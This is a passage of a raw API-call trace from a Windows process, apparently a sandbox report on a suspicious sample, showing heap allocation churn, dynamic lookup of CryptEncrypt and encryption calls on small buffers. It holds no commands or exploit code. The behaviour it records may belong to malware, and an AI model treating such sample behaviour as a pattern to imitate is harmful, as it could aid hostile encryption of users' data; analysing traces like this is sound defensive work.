(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0160.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa328, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0160.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.758] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0160.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6b20 [0160.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0160.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0160.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0160.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0160.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0160.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0160.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0160.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0160.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0160.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0160.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0160.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.759] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x97c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x980) returned 1 [0160.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a3358 [0160.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0160.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0160.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0160.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0160.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0160.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0160.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0160.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0160.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0160.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0160.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0160.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0160.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0160.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0160.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0160.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0160.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0160.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0160.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0160.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0160.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0160.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0160.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0160.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0160.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0160.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0160.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0160.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0160.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0160.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0160.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0160.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0160.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0160.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0160.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0160.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0160.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0160.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0160.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0160.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0160.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0160.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0160.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0160.763] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0160.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0160.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0160.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0160.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0160.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0160.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0160.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0160.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0160.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0160.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0160.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0160.765] CharLowerBuffW (in: lpsz="byte[2432]", cchLength=0xa | out: lpsz="byte[2432]") returned 0xa [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0160.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0160.766] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0160.766] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.766] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0160.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0160.766] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.766] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.766] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0160.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0160.767] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a3798*, pdwDataLen=0x8bef68*=0x97c, dwBufLen=0x980 | out: pbData=0x34a3798*, pdwDataLen=0x8bef68*=0x980) returned 1 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a3358 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0160.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0160.767] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0160.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0160.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 